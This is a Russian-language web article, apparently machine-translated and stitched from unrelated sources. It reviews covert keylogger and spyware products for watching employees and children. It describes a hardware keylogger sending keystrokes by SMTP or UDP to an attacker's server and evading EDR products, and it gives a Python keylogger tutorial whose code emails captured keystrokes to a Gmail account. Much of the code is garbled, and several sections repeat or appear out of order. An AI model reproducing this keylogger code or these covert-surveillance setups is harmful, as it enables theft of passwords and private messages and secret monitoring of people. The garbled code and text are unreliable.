- Что такое программа кейлоггер (keylogger)?
- Kidlogger Free | Бесплатно | Win, Mac, Android & iOS
- Законно ли отслеживание нажатий клавиш на клавиатуре?
- Revealer Keylogger Free | Бесплатно | Win
- Iwantsoft Free Keylogger | Win
- Keylogger в решении Bitcop
- Best Free Keylogger
- Kickidler | бесплатно/$9 | Win | Mac | Lin
- Какие еще функции есть в Kickidler?
- Ardamax Keylogger | $49 | Win
- Refog Free Keylogger | Бесплатно | Win
- Сценарии атаки
- Отправка собранных сведений через SMTP
- Отправка собранной информации через UDP
- SC-Keylogger
- Последующее исследование
- Сторонние приложения
- USBLogView
- Отслеживание изменения логов
- Менеджеры паролей
- Поможет ли антивирус?
- Сможет ли фаервол заблокировать передачу?
- Методы обнаружения устройства
- Можно ли обнаружить устройство в системе?
- Диспетчер устройств
- Best Free Keylogger | бесплатно/$39 | Win
- Actual Keylogger | $60 | Win
- Windows Keylogger — Pro
- Iwantsoft Free Keylogger
- Подготовка: устанавливаем Python и библиотеки
- KidInspector Кейлоггер
- Refog Free Keylogger
- Revealer Keylogger
- Spyrix Keylogger Free | Бесплатно | Win, Mac & Android
- Пишем кейлоггер
- Импорт библиотек
- Инициализируем параметры
- Создаем класс и методы
- Пишем метод для записи в локальный файл
- Отправка на email
- Сообщаем лог через заданные промежутки времени
- Что такое кейлоггер и зачем он нужен
- Keyber Кейлоггер
- Ardamax Keylogger
- Windows Keylogger | Бесплатно/USD49 | Win
Что такое программа кейлоггер (keylogger)?
Эти приложения также называют кейлоггерами. Это программное обеспечение для отслеживания нажатий клавиш. Неважно, какую цель преследует сотрудник в данный момент: общение в мессенджере, отправка электронного письма, ввод запроса в поисковой системе, работа с сайтом или создание отчета. Регистрация действий через кейлоггер осуществляется автоматически и постоянно.
Использование кейлоггеров не направлено на выяснение пароля личной электронной почты работника или его личной переписки. Целью программ-кейлоггеров является исключение действий сотрудников на рабочем ПК, не связанных с выполнением служебных обязанностей.
Кейлоггеры для отслеживания нажатий клавиш могут регистрировать все. Или ответить специалисту, введя определенные комбинации символов (слов и предложений). Ключевой мониторинг может осуществляться непрерывно или в определенное время, а информация может предоставляться онлайн или в виде периодических отчетов. Некоторые компьютерные программы-шпионы имеют возможность автоматически делать снимки экрана в ответ на действия пользователя и пересылать изображение на электронную почту руководителя. Все зависит от того, какое программное обеспечение (простое или сложное) установлено на ПК.
Kidlogger Free | Бесплатно | Win, Mac, Android & iOS
Родительский контроль помогает защитить детей в киберпространстве. Вы можете узнать, с кем разговаривают ваши дети, по телефону или онлайн, а менеджер компании с помощью такого программного обеспечения следит за активностью сотрудников и дисциплинирует их. Это что-то вроде личного автоматизированного дневника.
- Отслеживает местоположение ноутбука или телефона с помощью GPS
- Запись нажатий клавиш
- Сохраняет скриншоты
- Отслеживание веб-истории
- Запись разговоров (для Windows)
- Учет времени
- Мониторинг чата (Windows и MAC)
- Отслеживание местоположения телефона (Android, iOS, BlackBerry, MAC OS X), координат GPS или WiFi
- СМС (Android, Nokia, BlackBerry). Все входящие/исходящие SMS-сообщения с номером и именем отслеживаются.
Законно ли отслеживание нажатий клавиш на клавиатуре?
Кейлоггеры для Windows и MacOS фиксируют действия на компьютере, когда сотрудник выполняет служебные обязанности. Кейлоггеры в большинстве случаев не записывают активность мыши, хотя комплексная система мониторинга сотрудников может это сделать. Кейлоггер запоминает нажатия клавиш на вашем настольном ПК. Обратите внимание — рабочий.
Рабочий компьютер и телефон принадлежат компании. Программное обеспечение на них тоже фирменное. Все действия, которые выполняет специалист в рамках своих трудовых обязанностей, не являются личными. Компания нанимает время специалиста, и оно естественным образом переходит из разряда личного в рабочее. По закону компания имеет право использовать инструменты отслеживания действий сотрудников в рабочее время в целях контроля.
Поэтому совершенно законно следить за вашим компьютером с помощью программы-кейлоггера. Также установка программы для записи нажатий клавиш позволяет собирать данные, если сотрудники имеют удаленный доступ к ПК или серверу. Но в этом случае отслеживание действий на компьютере пользователя допускается только в рабочее время, указанное в договоре. Сложное программное обеспечение может делать снимки экрана и отправлять их на указанную электронную почту или облачный сервер.
Revealer Keylogger Free | Бесплатно | Win
Revealer Keylogger Free — эффективный кейлоггер для Windows. Программа активируется при запуске операционной системы, скрыта от глаз пользователей и защищена паролем. Но основные инструменты — снимки экрана и оповещения по электронной почте — недоступны в бесплатной версии. Программа также не записывает IP-адреса.
- Контролируется переписка через Skype, Facebook, MSN, AOL, ICQ, AIM, GTalk и т.д.
- Инструмент записи нажатий клавиш записывает текст, пароли и разговоры
- Функция защиты паролем предотвратит доступ третьих лиц к программе
- Функция создания снимков экрана (версия Pro за 50 долларов США)
Iwantsoft Free Keylogger | Win
Iwantsoft Free Keylogger целенаправленно отслеживает любую активность на компьютере: фиксируются нажатия клавиш, протоколируется содержимое системного кэша, активность в программах, отслеживается история посещений веб-сайтов в браузерах, есть функция создания скриншотов — чтобы сделать выводы о продуктивности сотрудников. Программа подходит для использования как на работе, так и дома. С его помощью родители могут узнать о потенциальных угрозах для своих детей, а для работодателей – это возможность обезопасить себя от утечек информации.
- Работает в фоновом режиме — кейлоггер всегда остается невидимым для пользователей, и только установщик программы может нажать специальную комбинацию клавиш и ввести пароль, чтобы кейлоггер снова стал видимым
- Фильтры и оповещения – все нежелательные приложения и веб-сайты блокируются. Вы можете получать мгновенные оповещения по электронной почте, когда пользователь вводит определенные ключевые фразы
Keylogger в решении Bitcop
Платформа: Windows XP, Vista, 7, 8, 10.
Бесплатная версия: полный функционал для одного пользователя
Система комплексного мониторинга данных
В программе имеется встроенный модуль, позволяющий запомнить все нажатые клавиши. В зависимости от настроек есть возможность активировать скриншоты. Программное обеспечение работает тайно; чтение нажатий клавиш не влияет на деятельность специалиста; он никак не взаимодействует с Bitcop. Помимо кейлоггеров, у решения есть и другие варианты. Например, полный лог действий специалиста — какие приложения он запускал, какие сайты посещал, что делал в тот или иной момент. Вы можете интегрировать в Bitcop сторонние решения, включая взаимодействие с IP-телефонией и коллтрекингом для повышения эффективности работы техподдержки или отделов продаж. Вы не можете скачать кейлоггер отдельно; данная функция встроена в дополнительный модуль комплекса.
Дополнительно в систему включены:
- Отслеживайте время, проведенное за компьютером,
- Логирование программ и сайтов,
- Контролировать переписку у менеджеров (скайп, вотсап, вайбер)
- Логирование интернет-запросов,
- Учет системных событий,
- Скрытый режим работы,
- Блокировка запрещенных сайтов,
- Сегодняшняя структура
- Скриншоты,
- Учет времени.
Best Free Keylogger
Платформа: Windows
Бесплатная версия: с ограниченными возможностями
Назначение: программа для чтения действий клавиатуры
«Лучший бесплатный кейлоггер» — это название программы на русском языке, а не в том смысле, что программа объективно лучшая. Это одна из самых простых программ для отслеживания и записи активности клавиатуры. В журнал (историю) входят все взаимодействия с кнопками (независимо от того, нажимает ли пользователь их по одному или в комбинациях).
Даже если человек решит удалить сообщения в онлайн-чате или мгновенных сообщениях, программа сохранит содержимое. Если человек удалит поисковые запросы, удалит историю просмотров или электронные письма, текст его сообщений все равно останется в истории. Единственные сообщения, которые он получает, не останутся, но программное обеспечение для отслеживания нажатий клавиш может делать снимки экрана. Его часто используют родители для наблюдения за деятельностью своего ребенка за компьютером в отсутствие взрослых.
Дополнительные возможности:
- Собирает данные об активности в Интернете,
- Регистрирует переписку по электронной почте и мгновенным сообщениям, сохраняет пароли,
- Мониторинг приложений,
- Сохраняет скриншоты,
- FTP, USB, локальная сеть,
- Невидимый режим работы.
Kickidler | бесплатно/$9 | Win | Mac | Lin
Kickidler — система учета рабочего времени и контроля использования ПК сотрудниками.
В Kickidler функция кейлоггера интегрирована с записью видео, то есть можно увидеть историю того, что было на экране пользователя, когда он вводил определенную комбинацию клавиш. Это дает максимально полную информацию о действиях сотрудника. Существует также фильтр ключевых слов и загрузка истории нажатий клавиш в Excel.
Система собирает информацию обо всех нажатиях клавиш во всех программах:
- В электронной почте (в том числе веб-почте Mail.ru, Gmail.com, Яндекс.ру и других),
- Социальные сети (ВКонтакте, Одноклассники, Facebook и другие)
- Мессенджеры (Skype, Viber, Telegram, ICQ, Lync и другие)
- Офисные программы (Microsoft Office или 1С)
Нажатые клавиши отображаются в режиме реального времени или в виде отчета. Есть отчет об интенсивности нажатий клавиш, из которого можно узнать, например, печатал ли сотрудник или время от времени нажимал пробел.
Собранную информацию (текст, видео и все нарушения рабочего режима) можно просмотреть на единой временной шкале — что, безусловно, позволяет узнать, чем занимался сотрудник в определенное время.
Зачем вам нужен кейлоггер:
- Предотвращение утечки данных (DLP)
- Контроль использования конфиденциальных данных (DLP – Data Loss Protection)
- Анализ производительности при вводе текста с клавиатуры
Дополнительный функционал: мониторинг нарушений, видеозапись, онлайн-мониторинг, учет эффективности рабочего времени.
Kickidler работает на компьютерах со всеми операционными системами: Windows, Linux и Mac OS. Существует бесплатная версия программы для компании до 6 сотрудников.
Читайте также: Что делать, если возникла ошибка Application Load Error 5 0000065434
Какие еще функции есть в Kickidler?
- Онлайн-мониторинг данных.
- Видеозапись работы за компьютером.
- Учет рабочего времени на ПК.
- Анализ эффективности.
- Контроль нарушений.
- Автоматические уведомления о нарушениях.
- Функция самоконтроля (для внешних сотрудников).
- Пульт дистанционного управления для ПК.
Ardamax Keylogger | $49 | Win
Ardamax Keylogger — это небольшой, удобный кейлоггер, который записывает все действия пользователя и сохраняет данные в файл журнала. Файл журнала может отображаться в формате текстового документа или веб-страницы. Этот инструмент будет сообщать обо всей активности на вашем компьютере в ваше отсутствие.
- Регистрация нажатий клавиш: это означает запись всех нажатий клавиш, введенных паролей, включая скрытые символы
- История посещений сайта. Все открытые веб-сайты фиксируются во всех браузерах
- Запись с веб-камеры. Скриншоты делаются через определенные промежутки времени и сохраняются в журнале
- Отправка журналов по электронной почте. Кейлоггер может отправлять записанные журналы по электронной почте в определенное время, что очень удобно для удаленного мониторинга
- Запись через микрофон. Запись голоса через микрофон со сжатием аудиофайлов в реальном времени
- Визуальное наблюдение. Снимки экрана делаются через регулярные промежутки времени, а файлы сохраняются в журнале
- Мониторинг чата. Ardamax Keylogger предназначен для записи и мониторинга обоих участников разговора в чатах, таких как AIM, Windows Live Messenger, ICQ, Skype, Yahoo Messenger, Google Talk, Miranda и QiP
Refog Free Keylogger | Бесплатно | Win
Самым большим преимуществом Refog Free Keylogger перед конкурентами является то, что это очень простая и удобная программа. Большинство шпионских программ имеют слишком много функций и сложны для понимания неспециалистами. Но эта программа очень проста в настройке и бесплатна. Список всего, что снято, зафиксировано и записано, настолько велик, что перечислять все нет смысла.
Вот лишь некоторые из особенностей:
- Все нажатия клавиш записываются, включая пароли
- Отправленные и полученные сообщения чата
- открытие веб-страниц
- Входы и выходы
- Скайп-чаты и голосовое общение
- открываемые приложения и игры
- Скриншоты
Сценарии атаки
Отправка собранных сведений через SMTP
Используя возможности устройства, злоумышленник может настроить SMTP для отправки по электронной почте отчетов со всеми собранными данными. На рисунке выше указано, что интервал отправки равен 2. Это означает, что собранные данные отправляются каждые две минуты. Единственным недостатком этой функции является то, что как только устройство подключится к Интернету, отчеты будут отправляться каждые две минуты, даже если новых данных нет. Более правильный подход — отправлять файлы только в том случае, если с момента последней передачи появилась новая информация.
Как только жертва введет информацию через скомпрометированную клавиатуру, ей будет отправлен отчет, как показано в примере ниже.
Рисунок 5. Пример отчета с собранными данными, введенными с помощью клавиатуры
- Настроить передачу через UDP
Рисунок 6. Настройка сервера, подключенного к Интернету и настроенного для протокола UDP
Отправка собранной информации через UDP
Злоумышленник может развернуть сервер VPS (виртуальный частный сервер) и настроить tcpdump для прослушивания через UDP для получения собранной информации. Когда ничего не подозревающий пользователь нажимает клавиши на клавиатуре, данные будут передаваться прослушивателю UDP в режиме реального времени при следующих условиях:
- Устройство настроено на подключение к Интернету (по Wi-Fi).
- Информация собирается со стандартной клавиатуры без сложных драйверов, например в игровых клавиатурах.
К сожалению, кейлоггер не сможет собирать нажатия с цифровой клавиатуры, но объем информации, получаемой с помощью этого небольшого устройства, все равно велик.
Используя следующую команду, вы можете настроить tcpdump для прослушивания указанного порта и отображения полученной информации:
sudo tcpdump -l -n -i ens3 dst порт 25998 и входящий -s0 -vvv -w keylog.pcap
На рисунке ниже показан текст, отправленный в потоке UDP. Файл keylog.pcap открывается в Wireshark для просмотра необработанных данных в UDP-пакетах:
Рис. 7. Каждый символ отправляется с устройства в отдельном пакете UDP
SC-Keylogger
Операционные системы: Windows
Полностью бесплатная версия
Назначение: запись действий мыши и перехватчик клавиатуры
Типичная программа-кейлоггер. В отличие от большинства аналогов, записывает действия мыши и клавиатуры. Обратите внимание, что действия мыши относятся к щелчкам, а не к перемещениям по экрану. Это базовая программа мониторинга ПК, ее основная задача — тайная запись нажатий клавиш в системе. Человек, работающий на этом ПК, может удалять переписку и очищать историю посещений сайтов, но история самого ПО при этом сохранится. Учет и запись информации осуществляется постоянно, пока программное обеспечение активно.
Информация о работе с ПК суммируется в автоматических отчетах и рассылается в целях удаленного мониторинга по электронной почте через заданный интервал. Как и предыдущая программа постоянного мониторинга клавиатуры, она подходит для упрощенного контроля за сотрудниками или может быть установлена на домашний компьютер для наблюдения за ребенком.
Последующее исследование
Сторонние приложения
Средство просмотра событий в Windows не внесло дополнительной ясности, поскольку ведение журнала USB отключено по умолчанию. Однако после включения регистрации событий относительно USB-устройств запись ведется, но найти что-то полезное очень сложно. Некоторые сторонние приложения могут подойти компаниям с большим бюджетом. Существуют также бесплатные программы, записывающие действия, связанные с USB-устройствами, особенно подключение и отключение устройства.
USBLogView
Приложение USBLogView позволяет отслеживать USB-устройства во время включения/выключения питания и записывает эти события в отдельный файл, хранящийся на вашем компьютере.
USBLogView отображает включение/отключение в визуальной форме со всей ключевой информацией для каждого используемого устройства, как показано на рисунке ниже.
Рис. 10. Полезная информация о событиях USB-устройства
Собранный файл журнала в формате CSV можно просмотреть в Excel:
Рисунок 11. Необработанные данные об активности USB-устройств
К сожалению, даже если эти данные отображаются в понятном формате, они все равно не выявляют наличие кейлоггера. Однако собранная информация может оказаться полезной для последующего анализа.
Отслеживание изменения логов
Если ваша организация использует продукты SolarWinds, вы можете настроить отчеты при изменении размера или содержимого файла. Например, отправка уведомлений системному администратору при изменении файла журнала, созданного приложением USBLogView, при подключении и отключении USB-устройства.
Однако в дальнейшем могут возникнуть трудности, связанные с выявлением источника активности в контексте USB-устройств на основании подозрительных событий. Особенно, когда файл журнала достигает больших размеров.
Теоретически эту проблему можно решить, назвав каждый файл журнала, расположенный на общем ресурсе, именем хоста, на котором был создан журнал. Таким образом, во время предупреждения специалист сможет быстро найти источник активности.
Менеджеры паролей
Если компания использует менеджер паролей, риск компрометации снижается. В этом случае на сайтах будет использоваться автозаполнение, а в других местах необходимость вводить пароли с клавиатуры практически отпадет.
Самым большим недостатком этой идеи является то, что если главный пароль для всей базы данных будет скомпрометирован, злоумышленник получит доступ ко всем паролям, и последствия могут быть катастрофическими.
Поможет ли антивирус?
В ходе исследования решений Endpoint Detection and Response (EDR), предназначенных для обнаружения и реагирования на атаки на конечные устройства, стало очевидно, что в некоторых случаях поиск выполняется не в том месте. Например, традиционные антивирусные программы проверяют, вставлена ли карта памяти. Затем устройство сканируется на наличие вредоносных приложений, прежде чем пользователь сможет получить доступ к содержимому. Большинство корпоративных решений для защиты конечных точек, таких как Symantec и Microsoft Anti Malware, работают именно таким образом.
Создатели других приложений, используемых для борьбы с кейлоггерами, утверждают, что пользователи будут надежно защищены от такого рода угроз. Однако исследования показывают, что защита существует только на уровне операционной системы, когда вся информация, вводимая с клавиатуры, шифруется.
Аппаратные кейлоггеры считывают данные до того, как они достигнут операционной системы, жесткого диска или оперативной памяти.
Чтобы проверить эту гипотезу, в системах, использующих популярные корпоративные решения EDR, был внедрен аппаратный кейлоггер.
Режиссер | Успех обнаружения |
Защитник Microsoft Windows (Windows 10) | Кейлоггер не обнаружен |
ESET Endpoint Security | Кейлоггер не обнаружен |
Защита от угроз для конечных точек Morphisec | Кейлоггер не обнаружен |
Spy Shelter Silent 11.7 Анти-ключевая регистрация | Кейлоггер не обнаружен |
Во всех вышеперечисленных случаях при вводе с клавиатуры все данные передавались на сервер или отправлялись по электронной почте.
Самое удивительное открытие произошло при получении данных из системы, где было установлено приложение против кейлоггера, которое якобы шифровало каждый набираемый символ. На изображении ниже показаны настройки приложения и текст, введенный в Блокноте:
Рисунок 12: Настройки приложения Spy Shelter Anti-Key Logging
Бесплатная версия «защищает» от кейлоггеров, шифруя всю информацию, вводимую с клавиатуры в процессах. Как видно на изображении выше, процесса notepad.exe нет в списке исключений.
Однако на рисунке ниже показан отчет, отправленный кейлоггером по электронной почте:
Рис. 13. Отчет, отправленный кейлоггером с компьютера, на котором установлен Spy Shelter
Устройство KeyLogger PRO смогло отправлять собранную информацию в незашифрованном виде, поскольку отслеживание кейлоггера происходит исключительно на программном уровне.
Сможет ли фаервол заблокировать передачу?
В KeyLogger PRO вы можете настроить беспроводную сеть для предоставления доступа в Интернет. Если в телефоне также настроена точка доступа и телефон находится в пределах видимости, становится возможным скрытно передать собранную информацию.
Аналогично, если в корпоративной инфраструктуре имеется гостевая сеть Wi-Fi без должной фильтрации, задача злоумышленника существенно упрощается.
Методы обнаружения устройства
Можно ли обнаружить устройство в системе?
Поскольку устройство работает на аппаратных ресурсах, был проведен анализ с целью идентификации устройства с помощью операционной системы Windows 10.
Диспетчер устройств
Диспетчер устройств отображает настройки подключенного составного USB-устройства (см рисунок ниже):
Рисунок 8. Вредоносные устройства не обнаружены
Затем вы можете щелкнуть правой кнопкой мыши USB Composite Device и просмотреть дополнительную информацию.
На рисунке ниже показана информация после подключения KeyLogger PRO вместе со стандартной USB-клавиатурой:
Рис. 9. VendorId отображается в разделе «Управление устройствами
Переменная «Идентификатор последнего экземпляра устройства» содержит информацию, помогающую идентифицировать вредоносное устройство. По документации на комбинированные агрегаты оказывается, что информация о драйвере отображается в следующем формате:
USB/VID_IdVendor&PID_IdProduct
По VENDORID (’04F3′) с рисунка выше получается, что устройство работает на USB-драйверах от производителя «Elan Microelectronics Corp». В приведенном ниже списке представлен список драйверов, связанных со значением VendorID:
- Проводная мышь.
- Беспроводная мышь.
- Проводная клавиатура.
- Беспроводная клавиатура.
- Сенсорный экран (сенсорный экран).
Интересно, что при подключении KeyLogger PRO к USB-разъему в диспетчере устройств ничего не появляется. Диспетчер устройств записывает только идентификатор поставщика, связанный с USB-клавиатурой при подключении к кейлоггеру, но не сам кейлоггер.
Этот факт сильно затрудняет даже специалисту определение того, вызвана ли активность на USB-порте легитимным устройством (при отключении и повторной активации) или появлением вредоносного кейлоггера.
Best Free Keylogger | бесплатно/$39 | Win
Best Free Keylogger — это инструмент мониторинга ПК, который совершенно невидим во время работы. Это программное обеспечение отслеживает нажатия клавиш, чаты, веб-активность, URL-адреса, скопированные тексты, файлы и снимки экрана. Одно из лучших решений для наблюдения за детьми, когда родителей нет дома.
- Запись нажатий клавиш
- Регистрация интернет-активности
- Логирование чатов и паролей
- Мониторинг буфера обмена
- Мониторинг приложений
- Скриншоты
- Электронная почта, FTP, LAN, USB
- Скрытый режим и защита паролем
- 100% невидимый
- Мониторинг расписания
- Автоматическая мойка бревен
Actual Keylogger | $60 | Win
Actual Keylogger — программа, которая отслеживает активность на вашем компьютере и позволяет узнать, что делают другие пользователи в ваше отсутствие. Это программное обеспечение отслеживает открытые или закрытые программы, посещенные веб-сайты и все нажатия клавиш, делает снимки экрана и копирует контент в буфер обмена.
Функции:
- Информация о запущенных и закрытых приложениях
- Регистрация нажатий клавиш
- Любая деятельность, связанная с печатью документов
- История сайтов в браузерах
- Скриншоты в установленное время
- Зашифрованные файлы любой активности
Windows Keylogger — Pro
Совместимость: Windows
Бесплатная версия: с ограниченными возможностями
Функциональность: программа скрытого мониторинга, записывающая нажатия клавиш
Скрытая программа для мониторинга вашего домашнего или рабочего компьютера с полным отслеживанием активности клавиатуры. Обратите внимание, что это сканер клавиатуры, а не сканер мыши или клавиатуры. Программное обеспечение для мониторинга телефона и другие решения не могут быть интегрированы. Kelogger контролирует систему независимо от обстоятельств, при которых пользователь нажимает кнопки и как использовать доступные функции. Пароли, поиски, вход на сайтах, переписка в мгновенных сообщениях и электронной почте – программа отслеживания данных зафиксирует все эти действия, сформирует отчет и отправит его на указанный адрес. Активность системы отслеживается и записывается незаметно, включая две уникальные функции — запись информации из буфера обмена и активацию по расписанию.
Кроме того:
- Сохраняет скриншоты,
- 100% невидимый режим,
- Доступ к отчетам по электронной почте и FTP,
- План мониторинга,
- Самоудаление
Iwantsoft Free Keylogger
Работает на Windows XP, Vista, 7, 8, 10.
Бесплатная версия: неограниченное использование
Цель: контролировать клавиатуру и буфер обмена, отслеживать посещения веб-сайта
Приложение с расширенными возможностями для мониторинга и контроля активности пользователей. Назначение – простой взломщик паролей, запоминающий нажатия клавиш. Работает незаметно, умеет делать скриншоты. Скриншоты с информацией как метод мониторинга и контроля сотрудников высылаются на указанную электронную почту. Программное обеспечение также подходит для наблюдения и наблюдения за ребенком. Удалять историю в браузере и мессенджере бесполезно; каждое действие записывается, когда пользователь нажимает кнопки. Что он получит не прописано, нет интеграции с телефоном или другим оборудованием. Одной из особенностей учета и мониторинга системы является наличие фильтров, блокирующих сетевые ресурсы и приложения.
- Предупреждения по ключевым словам
- Блокировка нежелательных веб-сайтов.
Подготовка: устанавливаем Python и библиотеки
Сначала нам нужно установить Python. Если это уже было сделано, можете смело пропустить этот раздел и приступить к установке библиотеки. В противном случае загрузите и установите соответствующую версию с официального языкового сайта. В этом уроке мы будем использовать Python 3.9, но в принципе подойдет любая версия.
Кроме того, нам понадобится библиотека клавиатуры. Он позволяет отслеживать и записывать ввод с клавиатуры.
Устанавливаем библиотеку простой командой в терминале:
pip3 установить клавиатуру
KidInspector Кейлоггер
Для: Windows, MacOS, Android, iOS
Бесплатная версия: с ограничениями, доступна только в течение 1 дня
Основные возможности: приложение для полного клавиатурного мониторинга системы с отправкой по электронной почте
Бесплатная опция сильно ограничена с точки зрения возможностей мониторинга и контроля. Но многие считают это программное обеспечение лучшим кейлоггером. Помимо запоминания и записи активности клавиатуры путем отправки отчетов по почте, решение отслеживает сетевую активность — записывает посещенные ресурсы и использование приложений. Работает отдельно с мгновенными сообщениями, соцсетями и СМС, записывает звонки с телефона. Регистрирует сообщения, которые пользователь хочет отправлять и получать. Отслеживает активность веб-камеры на ПК и телефоне. Решение подходит не столько для отслеживания работы сотрудников, сколько для мониторинга активности на личных устройствах ребенка или других членов семьи.
Refog Free Keylogger
Совместимость: Windows, MacOS
Бесплатная версия: бесплатный кейлоггер — с ограниченными возможностями программного обеспечения, платная версия полностью функциональна
Функциональность: контроль над компьютерами сотрудников с точки зрения использования клавиатуры
Типичная система записи действий мыши и клавиатуры. От мыши регистрируются только нажатия и запуск программы. Сама программа отслеживания используется для считывания паролей с клавиатуры, отслеживания переписки на онлайн-ресурсах, в социальных сетях и мессенджерах. Refog не считается лучшим кейлоггером для слежки за сотрудниками, но оптимален для домашнего использования. Он будет указывать, какие именно кнопки нажимал ребенок и какие сообщения он получал. Входящая текстовая информация не протоколируется, но система может делать скриншоты. Фиксируется запуск игр и других приложений, поиски, переходы к сетевым ресурсам, вход и выход из системы. Помимо захвата ввода с клавиатуры, программа-кейлоггер может записывать голос в таких приложениях, как Skype.
Revealer Keylogger
Платформа: Windows
Бесплатная версия: только сам кейлоггер
Назначение: программа для отслеживания действий на клавиатуре компьютера
Стандартная программа-кейлоггер без каких-либо уникальных функций. Он не самый лучший, для бизнес-ПК не подходит, так как имеет только ручной режим загрузки (в автозапуске не прописан). Может быть скрыт от пользователя с помощью комбинации клавиш. Делать скриншоты и не знать, что человек получает в сообщениях. Сохраняет записи и записи в журнале (журнале) только по активности клавиатуры. Ведение журнала включает дату и время, записывает пароли, а программное обеспечение не взаимодействует с телефоном. Результаты могут быть отправлены по электронной почте или на указанный сервер. Работать желательно только с версией Pro, где все эти функции присутствуют.
Кроме того:
- Отправляет отчеты по электронной почте, Dropbox, FTP, по локальной сети
- Программа полностью вылетает в диспетчере задач при запуске на диске.
Spyrix Keylogger Free | Бесплатно | Win, Mac & Android
Spyrix Keylogger — бесплатная программа для регистрации клавиш, которая позволяет записывать и отслеживать каждое нажатие клавиши, инструмент способен сохранять скриншоты активных программ через заданные промежутки времени — то есть записывается все, что происходит на экране.
- Удаленный мониторинг через защищенный онлайн-аккаунт
- Регистрация нажатий клавиш
- Невидимый для антивируса
- Запишите звонок через микрофон (в версии Pro за 80 долларов)
- Запись видео с веб-камеры — (версия Pro, 80 долларов США)
Пишем кейлоггер
Наш кейлоггер будет прослушивать и записывать нажатия клавиш в строковой переменной в фоновом режиме и отправлять содержимое через определенные промежутки времени в локальный файл или по электронной почте.
Импорт библиотек
Начнем с импорта необходимых библиотек:
import Keyboard import smtplib #для отправки электронной почты по протоколу SMTP (gmail) #Таймер для запуска через указанный интервал времени из потока import Таймер из datetime import datetime
Если вы хотите отправлять журналы по электронной почте, вам следует настроить учетную запись Gmail и убедиться, что в ней есть:
- доступ разрешен для небезопасных приложений;
- двухэтапная проверка отключена.
Рекомендуется создать отдельный адрес электронной почты от основного, так как код содержит в открытом виде ваш пароль, который используется для отправки сообщений.
Больше полезного материала вы найдете на нашем телеграм-канале «Хакерская библиотека» Интересно, переходите на канал
Инициализируем параметры
SEND_REPORT_EVERY = 60 #время в секундах EMAIL_ADDRESS = «notmygmail@gmail.com» EMAIL_PASSWORD = «не мой пароль»
Здесь вы должны предоставить правильные учетные данные Gmail, иначе отчет по электронной почте не будет работать.
Создаем класс и методы
Лучший способ придумать кейлоггер — создать для него класс, и каждый метод в этом классе выполняет определенную задачу:
class Keylogger: def __init__(self, интервал, report_method=»email»): # передать SEND_REPORT_EVERY в интервал self.interval = интервал self.report_method = report_method # это строковая переменная, содержащая журнал self.log = «» # регистрация дата и время начала и окончания self.start_dt = datetime.now() self.end_dt = datetime.now()
Мы установили метод отправки по умолчанию на электронную почту, что означает, что мы будем отправлять кейлоггеры по электронной почте. Альтернативно мы можем просто записать их в файл.
Мы используем клавиатурную функцию on_release(), которая принимает обратные вызовы.
def callback(self, event): name = event.name if len(name) > 1: #не символ, специальная клавиша (например, ctrl, alt и т д.) #uppercase if name == «space»: # » » вместо пробелов name = » » elif name == «enter»: #добавлять новую строку каждый раз при нажатии ENTER name = «ENTERn» elif name == «decimal»: name = «.» else: #замените пробелы подчеркиванием name = name.replace(» «, «_») name = f»{name.upper()}» #добавьте имя ключа в глобальную переменную self.log += name
Пишем метод для записи в локальный файл
def update_filename(self): #создайте имя файла, которое будет идентифицироваться по дате начала и окончания записи start_dt_str = str(self.start_dt):-7.replace(» «, «-«).replace(» :» , «») end_dt_str = str(self.end_dt):-7.replace(» «, «-«).replace(«:», «») self.filename = f»keylog-{start_dt_str} _{ end_dt_str }» def report_to_file(self): # создаем файл с open(f»{self.filename}.txt», «w») как f: # записываем журнал print(self.log, file=f) print(f «+ Сохранено {self.filename}.txt»)
Отправка на email
def sendmail(self, email, пароль, сообщение): # управляет подключением к SMTP-серверу server = smtplib.SMTP(host=»smtp.gmail.com», port=587) # подключается к SMTP-серверу в режиме TLS-сервера starttls() # вход в сервер.login(email, пароль) # отправка сообщения server.sendmail(email, email, message) # завершение сеанса server.quit()
Если консоль выдает ошибку типа UnicodeEncodeError при отправке журнала по электронной почте: кодек ascii не может кодировать символы, откройте библиотеку smtplib.py в C:UsersuserAppDataLocalProgramsPythonPython39Lib, найдите строку msg = _fix_eols(msg).encode(‘ascii’) и замените ее на msg = _fix_eols(msg).encode(‘utf8’). Ошибка связана с тем, что кодировка ASCII не может преобразовать кириллицу в байты.
Сообщаем лог через заданные промежутки времени
def report(self): if self.log: self.end_dt = datetime.now() # update `self.filename` self.update_filename() if self.report_method == «email»: self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log) elif self.report_method == «file»: self.report_to_file() self.start_dt = datetime.now() self.log = «» timer = Timer(interval=self.interval, function=self.report) timer.daemon = True # запуск timer.start()
Давайте определим метод on_release():
def start(self): #дата и время начала записи self.start_dt = datetime.now() #запуск кейлоггера Keyboard.on_release(callback=self.callback) self.report() Keyboard.wait()
С классом Keylogger мы закончили, теперь нам нужно создать экземпляр этого класса:
if __name__ == «__main__»: # для отправки по электронной почте раскомментируйте поле ниже и закомментируйте строку с report_method=»file» # keylogger = Keylogger(interval=SEND_REPORT_EVERY, report_method=»email») # для записи на локальный адрес файл, оставьте кейлоггер как есть = Keylogger(interval=SEND_REPORT_EVERY, report_method=»file») keylogger.start()
Что такое кейлоггер и зачем он нужен
Кейлоггер — это программа, предназначенная для записи ввода с клавиатуры. Кейлоггинг можно использовать для изучения [динамики нажатия клавиш] (.pdf), взаимодействия человека с компьютером, а также для хранения и анализа информации по мере ее ввода. Допустим, когда вы много работаете с текстом, кейлоггер может помочь собрать информацию о скорости ввода, производительности за определенный период времени и т д. С другой стороны, кейлоггеры часто используются хакерами для кражи паролей и другой конфиденциальной информации.
Keyber Кейлоггер
Платформа: Windows
Бесплатная версия: для частной работы, для коммерческих целей предлагается платная версия системы
Функционал: простой кейлоггер на русском языке
Программа, записывающая фразы, вводимые с клавиатуры, в скрытом режиме. Система не видит программу, ее сложно найти, удалить без прав администратора невозможно. Все нажатия клавиш пользователем (сотрудником в офисе или ребенком дома) программа фиксирует и сохраняет в отчете. Запись ввода с клавиатуры не влияет на рабочий процесс. Вы можете настроить периоды регистрации. Функционально это один из самых простых кейлоггеров на русском языке. Оптимально для получения ответа на вопрос, чем занимается ваш ребенок, пока вас нет рядом. В качестве бизнес-решения для рабочих ПК программа не особо актуальна, так как не позволит получить подробную и структурированную информацию о деятельности специалиста.
Кроме того:
- Отправка отчетов по электронной почте,
- Программа вызывается на компьютере комбинацией Ctrl+Win+Alt+K,
- Русскоязычный интерфейс.
Ardamax Keylogger
